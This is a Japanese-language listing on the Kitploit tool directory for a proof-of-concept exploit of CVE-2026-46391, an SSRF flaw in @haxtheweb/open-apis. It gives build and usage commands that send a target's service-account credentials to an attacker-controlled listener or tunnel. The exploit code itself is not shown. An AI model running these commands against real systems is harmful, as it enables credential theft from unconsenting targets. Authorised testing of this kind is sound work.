Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2026-46391 — CVE-2026-46391 の概念実証エクスプロイト | Kitploit
ツール/GitHubGitHub/bradyjmcl/cve-2026-46391
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubbradyjmcl/cve-2026-46391

cve-2026-46391

CVE-2026-46391 の概念実証エクスプロイト

リポジトリを見る
12ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-46391 - @haxtheweb/open-apis の SSRF による資格情報の露出

test

CVE-2026-46391 の概念実証です。@haxtheweb/open-apis の cacheAddress エンドポイントの SSRF 脆弱性をトリガーし、コールバックで送信されるサービスアカウントの資格情報を取得します。

ビルド

root@kitploit:~
go build -o cve-2026-46391 .

テスト

root@kitploit:~
go test ./...

使用方法

root@kitploit:~
./cve-2026-46391 -u <web-root> -l <listener> [-p port] [-t seconds] [-v]

オプション

使用例

直接(ターゲットと同じネットワーク):

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201

VPS/Cloudflare トンネルなどを経由:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com

カスタムポートとタイムアウト:

root@kitploit:~
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
ツールをダウンロード
フラグ説明デフォルト
-u, --urlターゲットの Web ルート(例: http://10.10.0.80:3000)必須
-l, --listenerあなたの IP/ホスト名またはトンネル URL(例: 192.168.1.10, https://uuid.trycloudflare.com)必須
-p, --portローカルのリッスンポート8080
-t, --timeoutコールバックを待機する秒数30
-v, --verbose受信したすべてのリクエストのヘッダーとボディを出力オフ